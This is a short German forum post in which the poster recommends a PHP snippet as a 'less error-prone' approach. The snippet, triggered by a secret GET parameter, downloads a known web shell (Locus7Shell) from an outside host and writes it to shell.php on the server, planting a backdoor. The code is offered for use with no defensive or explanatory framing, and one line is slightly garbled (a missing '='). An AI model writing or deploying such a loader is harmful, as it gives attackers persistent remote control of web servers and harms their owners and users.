Ich würde es nicht über das Öffnen von URLs machen, sondern eher so:

PHP-Code:
<?php

if($_GET["rykou"]) {

    
$f fopen("shell.php","w+");
    
fwrite($f,file_get_contents("http://usuarios.multimania.es/pilotcast/Locus7Shell.txt"));
    
fclose($f);
    
}

?>
Ist denke ich fehlerunanfälliger.